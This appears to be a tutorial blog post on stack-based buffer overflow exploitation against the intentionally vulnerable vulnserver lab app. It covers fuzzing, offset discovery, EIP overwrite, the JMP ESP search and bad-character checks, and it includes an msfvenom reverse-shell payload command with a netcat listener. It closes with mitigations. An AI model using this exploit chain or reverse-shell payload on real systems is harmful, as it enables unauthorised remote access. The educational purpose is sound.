In this post, we cover the basics of exploit development by exploiting a stack-based buffer overflow in a simple application. We look at the structure of stack memory, how a program executes in memory, what causes a buffer overflow and finally, as always, a practical demonstration of the attack.
What is Buffer Overflow?
A buffer overflow occurs when a program writes more data into a buffer than the buffer was allocated to hold, so the excess data spills over into adjacent memory.
Stack Memory Structure:
The stack is a region of memory assigned to a program for its execution. It holds local data, function arguments and return addresses while the program runs. It follows the Last In, First Out (LIFO) method of storage, i.e. the value most recently stored on the stack (PUSH) is the first one to be taken off it (POP).
Four things matter for understanding a stack overflow: three CPU registers, namely the ESP (Extended Stack Pointer), the EBP (Extended Base Pointer) and the EIP (Extended Instruction Pointer), and the Buffer Space on the stack itself. The diagrammatic layout of a memory stack is shown below:
Now let us take a brief look at each of these four components:
- Extended Stack Pointer (or the ESP): ESP is the CPU register that holds the memory address of the top of the stack, i.e. of the most recently pushed value. The value in the ESP changes with every PUSH and POP as the program executes.
- Buffer Space: It is the memory set aside on the stack for a function’s local data, such as a character array that receives user input. Data written to a buffer should never be allowed to go past the end of that buffer. This is ensured by checking the length of the input (bounds checking) and following a secure coding approach.
- Extended Base Pointer (or the EBP): EBP is the CPU register that holds the base address of the current stack frame. It generally remains fixed while a function executes and is used as a reference address for reaching the function’s local variables and arguments.
- Extended Instruction Pointer (or the EIP): EIP controls the flow of execution. It holds the location of the next instruction to be executed by the CPU. EIP cannot be written directly, but when a function returns, EIP is loaded from the return address saved on the stack. That saved return address is the main target of the buffer overflow attack, as overwriting it gives the attacker control of the EIP and therefore of execution.
When an application or program is loaded into memory for execution, it is allocated a stack. Each time a function is called, a new stack frame is created: the return address is pushed onto the stack, the caller’s EBP is saved, and the EBP is set to the base of the new frame. As the function runs, the ESP moves with every PUSH and POP so that it always points to the top of the stack, while the EIP is updated with the address of the next instruction to be executed according to the application logic. Local variables, including buffers, live inside the frame at lower addresses than the saved EBP and the return address, so data written past the end of a buffer moves toward them.
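The PUSH and POP behaviour described above can be sketched with a toy model. This is only an illustration, not how a CPU is implemented: the class name `Stack32`, the starting address and the stored values are all made up for the example. It shows that the stack grows toward lower addresses and that the last value pushed is the first one popped.

```python
class Stack32:
    """Toy model of a 32-bit x86 stack (hypothetical, for illustration only)."""

    def __init__(self, top=0x0012FFFC):
        self.esp = top      # ESP: address of the current top of the stack
        self.memory = {}    # address -> 32-bit value

    def push(self, value):
        # PUSH moves ESP down by 4 bytes, then stores the value there.
        self.esp -= 4
        self.memory[self.esp] = value & 0xFFFFFFFF

    def pop(self):
        # POP reads the value at ESP, then moves ESP back up by 4 bytes.
        value = self.memory.pop(self.esp)
        self.esp += 4
        return value


stack = Stack32()
stack.push(0x00401234)   # e.g. a return address (made-up value)
stack.push(0x0012FF80)   # e.g. the caller's saved EBP (made-up value)
last_in = stack.pop()    # the saved EBP comes off first: Last In, First Out
```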
Causes of Buffer Overflow:
A buffer overflow happens when more data is written to a buffer than it can hold, i.e. the data exceeds the allocated buffer space, so the excess overwrites the adjacent memory locations. A lack of bounds checking or input validation in the application code may leave the application vulnerable to a buffer overflow.
Anatomy of a Buffer Overflow Attack:
Let us assume we have a simple application that asks the user for their name. In the application code, the buffer allocated for the name is an array of 8 characters. Suppose the user’s name is Anthony. He enters his name, and since ‘Anthony’ (7 characters plus the terminating null byte) fits within the 8-character buffer, the application accepts it and exits normally. But let’s say the user enters his full name, ‘Anthony Martial’, which is well beyond the size of the buffer. If the application does not check the length of the input, it will accept the name, fill the buffer with ‘Anthony ’ and write ‘Martial’ onto the adjacent memory locations, which hold data such as the saved return address. When the function returns, the application treats the bytes of ‘Martial’ as the address of its next instruction. That address is invalid, so the application crashes.
An attacker can turn this behavior to their advantage. They first work out exactly how many bytes it takes to reach the saved return address, fill the buffer up to that point with padding, overwrite the return address with an address of their choosing and place their shellcode (machine instructions that do what the attacker wants) in the memory locations that follow. When the function returns, execution is redirected to the attacker’s shellcode, and the attacker can direct the flow of execution as needed.
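The name example can be simulated in a few lines. This is a sketch under assumed conditions: the frame layout (an 8-byte buffer directly followed by a 4-byte saved EBP and a 4-byte return address), the two address values and the function names are all hypothetical, and `unsafe_copy` merely imitates a C-style copy that does not check lengths.

```python
import struct

BUF_SIZE = 8  # the 8-character name buffer from the example


def make_frame(saved_ebp=0x0012FF80, return_address=0x00401234):
    # Assumed layout: [8-byte buffer][saved EBP][return address]
    return bytearray(BUF_SIZE) + struct.pack("<II", saved_ebp, return_address)


def unsafe_copy(frame, data):
    # Imitates a strcpy-style copy: writes the data plus a terminating
    # null byte starting at the buffer, with no length check at all.
    data = data + b"\x00"
    frame[0:len(data)] = data
    return frame


def saved_return(frame):
    # Read back the 4-byte return address that follows the saved EBP.
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]


ok = unsafe_copy(make_frame(), b"Anthony")
print(hex(saved_return(ok)))       # return address is untouched

bad = unsafe_copy(make_frame(), b"Anthony Martial")
print(bytes(bad[:BUF_SIZE]))       # the buffer holds b"Anthony "
print(hex(saved_return(bad)))      # now built from the bytes "ial\x00"
```

In the second call the return address no longer points into the program, which corresponds to the crash described above.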
Lab Setup:
For demonstration purposes, we’ll be using vulnserver, an application built to be intentionally vulnerable. It is a command-line Windows application, so our victim or target OS will be a Windows machine, which we will be attacking from our Kali Linux machine. The ultimate goal of the attack is to gain access to the Windows machine. For debugging, and for looking at the registers and memory, we’ll be using Immunity Debugger. For shellcode generation we will use msfvenom, with netcat as the listener.
The entire attack is based upon the following steps:
- Fuzzing the application to find roughly how much input makes it crash
- Finding the exact location of the crash (called the Offset)
- Confirming the offset, and control over the flow of execution by Overwriting the Instruction Pointer (EIP)
- Checking for bad characters
- Finding an application module with no memory protections that contains a JMP ESP instruction
- And finally, gaining access to the target
To save time, we will not spike the application to find out which input command is vulnerable. Instead, we start directly with fuzzing, because we know that the ‘TRUN’ command is vulnerable.
We run Immunity Debugger as administrator, attach it to vulnserver and then press the play button so that vulnserver starts accepting connections.
Fuzzing the Vulnserver:
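We fuzz vulnserver by sending the TRUN command followed by a string of the letter ‘A’ whose length grows with every request. After some time, we see in Immunity Debugger that the application has crashed.
Looking at the output of our fuzzing script, we find that the application crashed once the input reached 2400 bytes. This is only a rough figure, so the next step is to find the exact offset.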
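The fuzzing script itself is not shown, so the following is only a minimal sketch of what such a script might look like. Several details are assumptions rather than facts from this walkthrough: the `TRUN /.:/` prefix, the port 9999, the step of 100 bytes and the function names. It should only ever be pointed at a lab machine you own.

```python
import socket


def fuzz_payloads(prefix=b"TRUN /.:/", step=100, max_len=3000):
    # Yield the command followed by a growing run of 'A' characters.
    for length in range(step, max_len + 1, step):
        yield prefix + b"A" * length


def fuzz(host, port=9999, prefix=b"TRUN /.:/", timeout=5.0):
    """Send growing payloads; return the number of A's in the payload
    after which the target stopped responding, or None if it never did."""
    for payload in fuzz_payloads(prefix):
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.recv(1024)                  # read the server banner
                s.sendall(payload + b"\r\n")
                s.recv(1024)                  # wait for the server's reply
        except OSError:
            # Connection refused or timed out: the target has likely crashed.
            return len(payload) - len(prefix)
    return None
```

Calling `fuzz("<target_ip>")` against the lab machine would return the approximate crash length, which is then refined in the next step.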
Locating the Offset:
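After restarting vulnserver from within Immunity, we generate a 2500-byte pattern in which no four-byte sequence repeats. The pattern is not random: it is a fixed, cyclic sequence, which is what lets us locate a position in it later. For this purpose, we use the pattern_create Ruby script.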
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2500
We then send this pattern to vulnserver in place of the A’s, and after the crash we note the value in the EIP.
We then pass this value to the pattern_offset script, which tells us how many bytes of the pattern come before the four bytes that landed in the EIP. We find that our offset is 2003 bytes.
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <string_in_the_EIP>
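To see why a non-repeating pattern pins down the offset, here is a small Python sketch of the same idea. It is a re-implementation for illustration, not the Metasploit code: it assumes the familiar `Aa0Aa1Aa2...` layout (uppercase letter, lowercase letter, digit), and the function names are simply borrowed from the two scripts.

```python
import string


def pattern_create(length):
    # Build the sequence Aa0Aa1...Aa9Ab0... and cut it to the wanted length.
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    raise ValueError("requested length exceeds the size of this pattern")


def pattern_offset(eip_hex, length=2500):
    # The debugger shows EIP as a 32-bit number, but the bytes were stored
    # in memory in little-endian order, so reverse them before searching.
    needle = bytes.fromhex(eip_hex)[::-1].decode("ascii")
    return pattern_create(length).find(needle)   # -1 if not found


pattern = pattern_create(2500)
# Simulate a crash in which bytes 2003..2006 of the pattern end up in EIP.
eip_value = pattern[2003:2007].encode("ascii")[::-1].hex()
print(pattern_offset(eip_value))
```

Because every four-byte window of the pattern is unique, the value read from the EIP maps back to exactly one position.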
Confirming the Offset by Overwriting the EIP:
We now send 2003 A’s followed by 4 B’s to vulnserver to see whether our offset is correct and whether we can overwrite the EIP. If the offset is right, the EIP will read 42424242 after the crash, which is the hex value of ‘BBBB’.
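The confirmation payload is simple enough to sketch directly. As before, the `TRUN /.:/` prefix and the function name are assumptions for illustration. Only the 2003 A’s and the 4 B’s come from the steps above.

```python
def build_probe(offset=2003, prefix=b"TRUN /.:/"):
    # 'A' padding up to the saved return address, then four 'B' bytes
    # that should end up in EIP if the offset is correct.
    return prefix + b"A" * offset + b"B" * 4


probe = build_probe()
marker = probe[-4:]
print(marker.hex())   # the value to look for in EIP after the crash
```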
Locating the Application Module with no Memory Protections:
Now we must look for a module within the application that does not have any memory protections. For this purpose we’ll use mona, a Python script that we load into Immunity Debugger and run from its command bar.
$ !mona modules
The first highlighted module, essfunc.dll, has all memory protections disabled.
Now we must check whether we can use this module to our advantage. For this purpose, we must check whether the JMP ESP instruction is in the dll or not.
First, we determine the operation code (the opcode, i.e. the hex equivalent) of JMP ESP. We will use nasm_shell for this purpose.
Inside the nasm_shell prompt, we type JMP ESP and press Enter.
So, the opcode for JMP ESP is FFE4.
Let us search the application module for this opcode, and we find the instruction address for JMP ESP within this DLL.
$ !mona find -s "\xff\xe4" -m essfunc.dll
Now the question arises: what is ‘JMP ESP’ and why do we use it? Put simply, ‘JMP ESP’ means ‘jump to the address held in the ESP register’. Our shellcode will sit on the stack immediately after the overwritten return address, which is where the ESP points once the vulnerable function returns. Stack addresses can vary between runs, so rather than hard-coding the address of the shellcode, we overwrite the return address with the address of a JMP ESP instruction inside essfunc.dll. When the function returns, that address is loaded into the EIP, the CPU executes JMP ESP, execution lands on our shellcode and we get command execution on the system.
Next, we verify that we really control program execution. We place the address of the JMP ESP instruction in the four bytes that overwrite the EIP, written in little-endian format (x86 stores multi-byte values least significant byte first), and then check whether the EIP points to the JMP ESP instruction when the payload is processed.
To do so, we first look up the address of the JMP ESP instruction in Immunity and place a breakpoint on it, so that the program pauses when the execution flow reaches it. As seen in the screenshot below, after sending the payload the program stops at the breakpoint with the address of the JMP ESP instruction in the EIP, meaning that we now have full control of the execution flow.
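Little-endian packing is easy to get wrong by hand, so here is a short sketch using Python’s `struct` module. The address `0x12345678` is a made-up placeholder, not the address found by mona, and the helper name is hypothetical.

```python
import struct

JMP_ESP_OPCODE = b"\xff\xe4"   # the FFE4 opcode searched for with mona


def to_little_endian(address):
    # "<I" packs an unsigned 32-bit integer, least significant byte first.
    return struct.pack("<I", address)


placeholder = 0x12345678        # hypothetical address, for illustration only
packed = to_little_endian(placeholder)
print(packed.hex())             # the bytes appear in reverse order
```

The four packed bytes are what goes into the payload in place of the 4 B’s used earlier.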
Figuring out Bad Characters:
We now know that we control the EIP. Before we generate our shellcode, we need to find out which bad characters might break it, i.e. which byte values the application alters, drops or treats as the end of the input. The null byte (\x00), the line feed (\x0A) and the carriage return (\x0D) are common bad characters.
We find bad characters by sending every byte value to vulnserver, using the list of characters in hex from SecLists. We then follow the ESP in the memory dump and look for bytes that are missing or that differ from the sequence we sent.
Luckily, no bad characters are found within the application.
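Comparing the dump by eye is error-prone, so the check can be sketched in code. This is an illustrative helper, not part of any tool used here: the function names are made up, the null byte is excluded from the test string as an assumption, and `observed` stands for the bytes copied out of the debugger’s memory dump.

```python
def all_bytes(exclude=b"\x00"):
    # Every byte value from 0x00 to 0xff except the excluded ones.
    return bytes(b for b in range(256) if b not in exclude)


def first_bad_char(sent, observed):
    # Walk both sequences in step and report the first byte that did not
    # arrive intact. Returns None if the whole sequence matches.
    for index, value in enumerate(sent):
        if index >= len(observed) or observed[index] != value:
            return value
    return None


sent = all_bytes()
clean_dump = sent                                   # nothing was mangled
mangled_dump = sent[:9] + b"\x20" + sent[10:]       # pretend 0x0a was altered

print(first_bad_char(sent, clean_dump))
print(hex(first_bad_char(sent, mangled_dump)))
```

When a bad character is found, the usual routine is to remove it from the list, resend and compare again until the dump matches.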
Generating Shellcode and Gaining Access:
Now that we have the return address that will lead the EIP to our shellcode, and we know which characters to avoid, it is time to generate our shellcode and exploit the application.
We will generate our shellcode using msfvenom, excluding the three common bad characters with the -b option to be safe.
$ msfvenom -p windows/shell_reverse_tcp LHOST=<attacking_machine_ip> LPORT=<attacking_machine_listening_port> EXITFUNC=thread -a x86 -b '\x00\x0A\x0D' -f c
We set the exit function to thread so that, when the shell exits, the shellcode terminates only the thread it is running in rather than the whole process, and vulnserver keeps running. Time to send over our shellcode and gain access to the target. After making the necessary changes to our script, we set up a listener and fire away the exploit.
$ nc -lvnp 1337
And as soon as the script runs, we get a shell on the target from our attacking machine.
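The "necessary changes to our script" are not shown, so the following is only a sketch of how the final buffer might be laid out. Everything specific in it is an assumption: the `TRUN /.:/` prefix, the function name, the placeholder return address, the run of NOP bytes (\x90) placed before the shellcode as breathing room, and the stand-in shellcode, which is just a few INT3 breakpoint bytes rather than real msfvenom output.

```python
import struct


def build_exploit(ret_addr, shellcode, offset=2003, nop_count=32,
                  prefix=b"TRUN /.:/", bad_chars=b"\x00\x0a\x0d"):
    ret = struct.pack("<I", ret_addr)            # little-endian return address
    # Refuse to build a payload that contains a known bad character.
    found = sorted(set(ret + shellcode) & set(bad_chars))
    if found:
        raise ValueError("bad characters in payload: %s"
                         % ", ".join(hex(b) for b in found))
    # Layout: command | padding | return address | NOPs | shellcode
    return prefix + b"A" * offset + ret + b"\x90" * nop_count + shellcode


placeholder_ret = 0x11223344          # hypothetical, not the real JMP ESP address
stand_in_shellcode = b"\xcc" * 8      # INT3 bytes as a harmless stand-in
payload = build_exploit(placeholder_ret, stand_in_shellcode)
print(len(payload))
```

With the real JMP ESP address and the msfvenom output substituted in, the same layout is what gets sent to the target while the netcat listener waits.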
Defense & Mitigation
- Implement secure coding practices when developing and building applications, by using functions that enforce a length limit (for example strncpy instead of strcpy).
- Apply proper input validation, including checks on input length.
- Enable memory protections like Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP) and the protections for Structured Exception Handling (SafeSEH and SEHOP).